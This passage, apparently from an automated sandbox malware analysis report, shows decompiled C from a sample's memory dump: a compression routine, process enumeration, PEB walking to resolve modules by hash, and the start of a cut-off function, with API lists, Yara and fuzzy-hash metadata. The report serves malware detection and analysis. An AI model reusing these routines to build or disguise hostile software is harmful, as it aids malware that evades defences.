                  														 *(_t417 + 0x48) =  *(_t417 + 0x48) | (_t403 & 0x0000ffff) << _t372;
                  														_t227 = _t372 + 0x10; // 0x18
                  														_t306 = _t227;
                  														 *(_t417 + 0x44) = _t306;
                  														if(_t306 < 8) {
                  															goto L83;
                  														} else {
                  															goto L80;
                  														}
                  														do {
                  															L80:
                  															_t373 =  *((intOrPtr*)(_t417 + 0x30));
                  															if(_t373 <  *((intOrPtr*)(_t417 + 0x34))) {
                  																 *_t373 =  *(_t417 + 0x48);
                  																 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  															}
                  															 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  															 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  														} while ( *(_t417 + 0x44) >= 8);
                  														L83:
                  														_t403 = _t403 ^ 0x0000ffff;
                  														_t359 = _t359 - 1;
                  													} while (_t359 != 0);
                  													goto L84;
                  												}
                  												 *(_t417 + 0x44) = 8;
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t371;
                  												do {
                  													_t374 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t374 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t374 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= 8);
                  												goto L79;
                  											} else {
                  												goto L71;
                  											}
                  											do {
                  												L71:
                  												_t375 =  *((intOrPtr*)(_t417 + 0x30));
                  												if(_t375 <  *((intOrPtr*)(_t417 + 0x34))) {
                  													 *_t375 =  *(_t417 + 0x48);
                  													 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  												}
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  												 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  											} while ( *(_t417 + 0x44) >= 8);
                  											goto L74;
                  										}
                  										if(_t370 == 0) {
                  											L38:
                  											if(( *(_t417 + 8) & 0x00001000) == 0) {
                  												goto L84;
                  											}
                  											_t404 =  *(_t417 + 0x18);
                  											do {
                  												_t376 =  *(_t417 + 0x44);
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t404 >> 0x00000018 << _t376;
                  												_t113 = _t376 + 8; // 0x10
                  												_t315 = _t113;
                  												 *(_t417 + 0x44) = _t315;
                  												if(_t315 < 8) {
                  													goto L44;
                  												} else {
                  													goto L41;
                  												}
                  												do {
                  													L41:
                  													_t377 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t377 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t377 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= 8);
                  												L44:
                  												_t404 = _t404 << 8;
                  												_t415 = _t415 - 1;
                  											} while (_t415 != 0);
                  											goto L84;
                  										}
                  										 *(_t417 + 0x44) = 8;
                  										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
                  										do {
                  											_t378 =  *((intOrPtr*)(_t417 + 0x30));
                  											if(_t378 <  *((intOrPtr*)(_t417 + 0x34))) {
                  												 *_t378 =  *(_t417 + 0x48);
                  												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  											}
                  											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  										} while ( *(_t417 + 0x44) >= 8);
                  										goto L38;
                  									}
                  									 *((intOrPtr*)(_t417 + 0x30)) = _t411;
                  									_t130 =  &_v8; // 0x40473a
                  									 *(_t417 + 0x48) = 0 << _t358 |  *_t130;
                  									_t324 = _t358 + 2;
                  									_t416 = 8;
                  									 *(_t417 + 0x44) = _t324;
                  									if(_t324 < _t416) {
                  										L52:
                  										_t382 =  *(_t417 + 0x44);
                  										if(_t382 == 0) {
                  											L57:
                  											_t359 = 2;
                  											_t406 = _t359;
                  											do {
                  												_t383 =  *(_t417 + 0x44);
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(_t417 + 0x3c) & 0x0000ffff) << _t383;
                  												_t162 = _t383 + 0x10; // 0x108
                  												_t327 = _t162;
                  												 *(_t417 + 0x44) = _t327;
                  												if(_t327 < _t416) {
                  													goto L62;
                  												} else {
                  													goto L59;
                  												}
                  												do {
                  													L59:
                  													_t386 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t386 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t386 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= _t416);
                  												L62:
                  												 *(_t417 + 0x3c) =  *(_t417 + 0x3c) ^ 0x0000ffff;
                  												_t406 = _t406 - 1;
                  											} while (_t406 != 0);
                  											if( *(_t417 + 0x3c) <= _t406) {
                  												goto L31;
                  											} else {
                  												goto L64;
                  											}
                  											do {
                  												L64:
                  												_t384 =  *(_t417 + 0x44);
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(( *((intOrPtr*)(_t417 + 0x40)) + _t406 & 0x00007fff) + _t417 + 0x90) & 0x000000ff) << _t384;
                  												_t183 = _t384 + 8; // 0x100
                  												_t333 = _t183;
                  												 *(_t417 + 0x44) = _t333;
                  												if(_t333 < _t416) {
                  													goto L68;
                  												} else {
                  													goto L65;
                  												}
                  												do {
                  													L65:
                  													_t385 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t385 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t385 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= _t416);
                  												L68:
                  												_t406 = _t406 + 1;
                  											} while (_t406 <  *(_t417 + 0x3c));
                  											goto L31;
                  										}
                  										 *(_t417 + 0x44) = _t416;
                  										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t382;
                  										do {
                  											_t387 =  *((intOrPtr*)(_t417 + 0x30));
                  											if(_t387 <  *((intOrPtr*)(_t417 + 0x34))) {
                  												 *_t387 =  *(_t417 + 0x48);
                  												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  											}
                  											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  										} while ( *(_t417 + 0x44) >= _t416);
                  										goto L57;
                  									} else {
                  										goto L49;
                  									}
                  									do {
                  										L49:
                  										_t388 =  *((intOrPtr*)(_t417 + 0x30));
                  										if(_t388 <  *((intOrPtr*)(_t417 + 0x34))) {
                  											 *_t388 =  *(_t417 + 0x48);
                  											 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  										}
                  										 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  										 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  									} while ( *(_t417 + 0x44) >= _t416);
                  									goto L52;
                  								}
                  								if(( *(_t417 + 8) & 0x00040000) != 0 ||  *(_t417 + 0x3c) < 0x30) {
                  									_t400 = 1;
                  								}
                  								_t401 = E0040378E(_t417, _t400);
                  								if( *(_t417 + 0x3c) == 0 ||  *((intOrPtr*)(_t417 + 0x30)) - _t411 + 1 <  *(_t417 + 0x3c)) {
                  									goto L28;
                  								} else {
                  									goto L47;
                  								}
                  							} else {
                  								goto L19;
                  							}
                  							do {
                  								L19:
                  								_t393 =  *((intOrPtr*)(_t417 + 0x30));
                  								if(_t393 <  *((intOrPtr*)(_t417 + 0x34))) {
                  									 *_t393 =  *(_t417 + 0x48);
                  									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  								}
                  								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  							} while ( *(_t417 + 0x44) >= _t410);
                  							goto L22;
                  						} else {
                  							_t394 =  *(_t417 + 0x44);
                  							_t342 = 0x78;
                  							 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t342 << _t394;
                  							_t344 = _t394 + 8;
                  							 *(_t417 + 0x44) = _t344;
                  							if(_t344 < _t410) {
                  								L14:
                  								_t395 =  *(_t417 + 0x44);
                  								 *(_t417 + 0x48) =  *(_t417 + 0x48) | 1 << _t395;
                  								_t47 = _t395 + 8; // 0x100
                  								_t348 = _t47;
                  								 *(_t417 + 0x44) = _t348;
                  								if(_t348 < _t410) {
                  									goto L18;
                  								} else {
                  									goto L15;
                  								}
                  								do {
                  									L15:
                  									_t396 =  *((intOrPtr*)(_t417 + 0x30));
                  									if(_t396 <  *((intOrPtr*)(_t417 + 0x34))) {
                  										 *_t396 =  *(_t417 + 0x48);
                  										 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  									}
                  									 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  									 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  								} while ( *(_t417 + 0x44) >= _t410);
                  								goto L18;
                  							} else {
                  								goto L11;
                  							}
                  							do {
                  								L11:
                  								_t397 =  *((intOrPtr*)(_t417 + 0x30));
                  								if(_t397 <  *((intOrPtr*)(_t417 + 0x34))) {
                  									 *_t397 =  *(_t417 + 0x48);
                  									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  								}
                  								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  							} while ( *(_t417 + 0x44) >= _t410);
                  							goto L14;
                  						}
                  					}
                  				}
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$memcpy
                  • String ID: 0HCw$:G@
                  • API String ID: 368790112-2591896426
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: bff9ad06bf82d853f9c70daa61a207c77b125d2d5e3c741b47fcf7fead7e8f56
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: 20023171601B108FC776CF29C680523BBF5BF55B227604A2EC6E796E91D23AF941CB08
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00401943(void* __edx) {
                  				void* _v560;
                  				void* _t5;
                  				struct tagPROCESSENTRY32W* _t6;
                  				void* _t12;
                  				void* _t13;
                  
                  				_t12 = __edx;
                  				_t5 = CreateToolhelp32Snapshot(2, 0);
                  				_t13 = _t5;
                  				if(_t13 != 0xffffffff) {
                  					_t6 =  &_v560;
                  					_v560 = 0x22c;
                  					Process32FirstW(_t13, _t6);
                  					while(_t6 != 0 && E00402255( &_v560, _t12) != 0) {
                  						_t6 = Process32NextW(_t13,  &_v560);
                  					}
                  					return CloseHandle(_t13);
                  				}
                  				return _t5;
                  			}









                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401954
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00401973
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401983
                  • CloseHandle.KERNEL32(00000000), ref: 0040199F
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(0040C6D4,00000000,?,?,0040199A,0000022C,0040C6D4), ref: 00402273
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(?,0040199A,0000022C,0040C6D4), ref: 00402284
                    • Part of subcall function 00402255: lstrcpyW.KERNEL32(00000004,0000022C), ref: 004022B6
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 210870473-0
                  • Opcode ID: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction ID: 16848b0ed7bca5f6eaa718ca54d67b5e4b9d7aaec9667f6a8c5e1db911b667c7
                  • Opcode Fuzzy Hash: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction Fuzzy Hash: 93F096715011287AD720AB79AC0CFEF7B7CDB49711F1081B2ED05F21D0D7388A058A99
                  Uniqueness

                  Uniqueness Score: 0.04%

                  C-Code - Quality: 100%
                  			E0040436D(intOrPtr* __ecx) {
                  				char _v5;
                  				intOrPtr _v12;
                  				intOrPtr* _v16;
                  				signed int _v20;
                  				intOrPtr _v24;
                  				signed int _v28;
                  				char _v32;
                  				signed int _v36;
                  				intOrPtr _t155;
                  				signed int _t161;
                  				void* _t167;
                  				signed int _t178;
                  				void* _t189;
                  				signed int _t192;
                  				signed int _t203;
                  				signed char _t213;
                  				signed int _t217;
                  				signed char _t219;
                  				signed int _t220;
                  				intOrPtr _t224;
                  				intOrPtr _t226;
                  				signed int _t228;
                  				signed int _t231;
                  				intOrPtr _t234;
                  				void* _t236;
                  				intOrPtr* _t240;
                  				intOrPtr _t243;
                  				intOrPtr _t244;
                  				signed int _t250;
                  				intOrPtr* _t253;
                  				intOrPtr* _t257;
                  				intOrPtr _t258;
                  				signed int _t260;
                  				signed int _t264;
                  				signed int _t267;
                  				intOrPtr* _t274;
                  				intOrPtr _t275;
                  				void* _t276;
                  				signed int _t277;
                  				signed int _t279;
                  				signed int _t281;
                  				void* _t283;
                  
                  				_t274 = __ecx;
                  				_t257 =  *((intOrPtr*)(__ecx + 0x84));
                  				_t275 =  *((intOrPtr*)(__ecx + 0x88));
                  				_t155 =  *((intOrPtr*)(__ecx + 0x80));
                  				_v16 = _t257;
                  				_v12 = _t275;
                  				_v24 = _t155;
                  				L2:
                  				while(_t275 != 0 || _t155 != 0 &&  *((intOrPtr*)(_t274 + 0x20)) != _t275) {
                  					_t224 =  *((intOrPtr*)(_t274 + 0x20));
                  					if( *((intOrPtr*)(_t274 + 0x24)) + _t224 < 2) {
                  						while(_t275 != 0) {
                  							if( *((intOrPtr*)(_t274 + 0x20)) >= 0x102) {
                  								L12:
                  								_t258 =  *((intOrPtr*)(_t274 + 0x20));
                  								_t226 =  <  ? 0x8000 - _t258 :  *((intOrPtr*)(_t274 + 0x24));
                  								 *((intOrPtr*)(_t274 + 0x24)) = _t226;
                  								if(_v24 != 0 || _t258 >= 0x102) {
                  									_t217 = 0;
                  									_t276 = 2;
                  									_t277 =  !=  ?  *(_t274 + 0x50) : _t276;
                  									_t161 =  *(_t274 + 0x1c) & 0x00007fff;
                  									_v28 = 1;
                  									_v32 = 0;
                  									_v36 = _t277;
                  									_v20 = _t161;
                  									if(( *(_t274 + 8) & 0x00090000) == 0) {
                  										E00403C52( &_v32, _t274,  *(_t274 + 0x1c), _t226, _t258,  &_v32,  &_v36);
                  										_t217 = _v32;
                  										_t283 = _t283 + 0x10;
                  										_t277 = _v36;
                  										_t228 = _v20;
                  										L32:
                  										if(_t277 != 3 || _t217 < 0x2000) {
                  											L34:
                  											if(_t228 == _t217 || ( *(_t274 + 8) & 0x00020000) != 0 && _t277 <= 5) {
                  												goto L37;
                  											} else {
                  												goto L38;
                  											}
                  										} else {
                  											L37:
                  											_t277 = 0;
                  											_t217 = 0;
                  											L38:
                  											_t260 =  *(_t274 + 0x50);
                  											if(_t260 == 0) {
                  												if(_t217 != 0) {
                  													if( *((intOrPtr*)(_t274 + 0x14)) != 0 || ( *(_t274 + 8) & 0x00010000) != 0 || _t277 >= 0x80) {
                  														E004042D4(_t274, _t277, _t217);
                  														L53:
                  														_t231 = _t277;
                  														goto L54;
                  													} else {
                  														_t178 =  <  ? _t228 : 0x8100;
                  														L51:
                  														 *(_t274 + 0x54) =  *(_t178 + _t274 + 0x90) & 0x000000ff;
                  														 *((intOrPtr*)(_t274 + 0x4c)) = _t217;
                  														 *(_t274 + 0x50) = _t277;
                  														L46:
                  														_t231 = _v28;
                  														L54:
                  														 *(_t274 + 0x1c) =  *(_t274 + 0x1c) + _t231;
                  														 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) - _t231;
                  														_t167 =  *((intOrPtr*)(_t274 + 0x24)) + _t231;
                  														_t233 =  <  ? _t167 : 0x8000;
                  														 *((intOrPtr*)(_t274 + 0x24)) =  <  ? _t167 : 0x8000;
                  														_t234 =  *((intOrPtr*)(_t274 + 0x28));
                  														if(_t234 > _t274 + 0x1926a) {
                  															L58:
                  															_t275 = _v12;
                  															 *((intOrPtr*)(_t274 + 0x84)) = _v16;
                  															 *((intOrPtr*)(_t274 + 0x88)) = _t275;
                  															_t236 = E004037A9(_t274, 0);
                  															if(_t236 != 0) {
                  																return 0 | _t236 > 0x00000000;
                  															}
                  															_t155 = _v24;
                  															L1:
                  															_t257 = _v16;
                  															goto L2;
                  														}
                  														_t275 = _v12;
                  														_t155 = _v24;
                  														if( *((intOrPtr*)(_t274 + 0x3c)) <= 0x7c00) {
                  															goto L1;
                  														}
                  														if((_t234 - _t274 - 0x9272) * 0x73 >> 7 >=  *((intOrPtr*)(_t274 + 0x3c))) {
                  															goto L58;
                  														}
                  														_t155 = _v24;
                  														if(( *(_t274 + 8) & 0x00080000) == 0) {
                  															goto L1;
                  														}
                  														goto L58;
                  													}
                  												}
                  												_t181 =  <  ? _t228 : 0x8100;
                  												E004042A2(_t274,  *((intOrPtr*)(( <  ? _t228 : 0x8100) + _t274 + 0x90)));
                  												goto L46;
                  											}
                  											_t240 = _t274;
                  											if(_t277 <= _t260) {
                  												E004042D4(_t240, _t260,  *((intOrPtr*)(_t274 + 0x4c)));
                  												_t231 =  *(_t274 + 0x50) - 1;
                  												 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
                  												goto L54;
                  											}
                  											E004042A2(_t240,  *(_t274 + 0x54));
                  											if(_t277 < 0x80) {
                  												_t178 = _v20;
                  												goto L51;
                  											}
                  											E004042D4(_t240, _t277, _t217);
                  											 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
                  											goto L53;
                  										}
                  									}
                  									_t228 = _t161;
                  									if(_t226 != 0 && ( *(_t274 + 8) & 0x00080000) == 0) {
                  										_t277 = 0;
                  										_v5 =  *((intOrPtr*)((_t228 - 0x00000001 & 0x00007fff) + _t274 + 0x90));
                  										if(_t258 == 0) {
                  											L30:
                  											_t277 = 0;
                  											goto L34;
                  										}
                  										_t189 = _t228 + _t274;
                  										_t243 = _v5;
                  										while( *((intOrPtr*)(_t189 + _t277 + 0x90)) == _t243) {
                  											_t277 = _t277 + 1;
                  											if(_t277 < _t258) {
                  												continue;
                  											}
                  											break;
                  										}
                  										_t228 = _v20;
                  										if(_t277 < 3) {
                  											goto L30;
                  										}
                  										_t217 = 1;
                  									}
                  									goto L32;
                  								} else {
                  									_t257 = _v16;
                  									goto L61;
                  								}
                  							}
                  							_t219 =  *_t257;
                  							_t192 =  *(_t274 + 0x1c) +  *((intOrPtr*)(_t274 + 0x20)) & 0x00007fff;
                  							_t257 = _t257 + 1;
                  							_t275 = _t275 - 1;
                  							_v16 = _t257;
                  							_v12 = _t275;
                  							 *(_t192 + _t274 + 0x90) = _t219;
                  							if(_t192 < 0x101) {
                  								 *(_t192 + _t274 + 0x8090) = _t219;
                  							}
                  							 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) + 1;
                  							_t244 =  *((intOrPtr*)(_t274 + 0x20));
                  							if( *((intOrPtr*)(_t274 + 0x24)) + _t244 >= 3) {
                  								_t279 =  *(_t274 + 0x1c) + _t244 + 0xfffffffd;
                  								_t264 = _t279 & 0x00007fff;
                  								_t250 = (( *(_t264 + _t274 + 0x90) & 0x000000ff) << 0x0000000a ^ _t219 & 0x000000ff) & 0x00007fff ^ ( *((_t279 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0xff) << 0x00000005;
                  								 *((short*)(_t274 + 0x19272 + _t264 * 2)) =  *(_t274 + 0x29272 + _t250 * 2);
                  								_t257 = _v16;
                  								 *(_t274 + 0x29272 + _t250 * 2) = _t279;
                  								_t275 = _v12;
                  							}
                  						}
                  						goto L12;
                  					}
                  					_t203 =  *(_t274 + 0x1c) + _t224;
                  					_t281 = _t203 & 0x00007fff;
                  					_t220 = _t203 - 2;
                  					_t267 = ( *((_t220 & 0x00007fff) + _t274 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t220 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0x000000ff;
                  					_t211 =  <  ? _v12 : 0x102 - _t224;
                  					_v12 = _v12 - 0x102;
                  					_t212 = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
                  					_v28 = _v16 + 0x102;
                  					 *((intOrPtr*)(_t274 + 0x20)) = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
                  					while(1) {
                  						_t253 = _v16;
                  						if(_t253 == _v28) {
                  							break;
                  						}
                  						_t213 =  *_t253;
                  						_v16 = _t253 + 1;
                  						 *(_t274 + _t281 + 0x90) = _t213;
                  						if(_t281 < 0x101) {
                  							 *(_t281 + _t274 + 0x8090) = _t213;
                  						}
                  						_t267 = (_t267 << 0x00000005 ^ _t213 & 0x000000ff) & 0x00007fff;
                  						_t281 = _t281 + 0x00000001 & 0x00007fff;
                  						 *((short*)(_t274 + 0x19272 + (_t220 & 0x00007fff) * 2)) =  *(_t274 + 0x29272 + _t267 * 2);
                  						 *(_t274 + 0x29272 + _t267 * 2) = _t220;
                  						_t220 = _t220 + 1;
                  					}
                  					_t275 = _v12;
                  					goto L12;
                  				}
                  				L61:
                  				 *((intOrPtr*)(_t274 + 0x84)) = _t257;
                  				 *((intOrPtr*)(_t274 + 0x88)) = _t275;
                  				return 1;
                  			}














































                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction ID: e33084252fcec48e949ebcca89b2b69e4ca8ec5097f1102ae8c543975fbc8947
                  • Opcode Fuzzy Hash: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction Fuzzy Hash: 4FC1C271B04916ABCB18CE68C4907BAF7F1BF89304F04427ED659A7781D73CA855CB88
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E004012CD(void* __ecx) {
                  				void* _t8;
                  				intOrPtr* _t12;
                  				intOrPtr* _t13;
                  
                  				_t8 = __ecx;
                  				_t12 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
                  				_t13 =  *_t12;
                  				while(_t13 != _t12) {
                  					if(E00401161( *((intOrPtr*)(_t13 + 0x30))) == _t8) {
                  						return  *((intOrPtr*)(_t13 + 0x18));
                  					}
                  					_t13 =  *_t13;
                  				}
                  				return 0;
                  			}







                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction ID: 7ecbe99e9aff7bbd4a6860067150bf6fe1a6c3b143e7c3a6fabfcc45b8fe1074
                  • Opcode Fuzzy Hash: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction Fuzzy Hash: EFE086333104508BC720DA99C480857F3F9EB84370B2908BFE546F7A61C338BC019688
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E00401E04() {
                  
                  				return  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                  			}



                  0x00401e10

                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  C-Code - Quality: 83%
                  			E004076C6(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
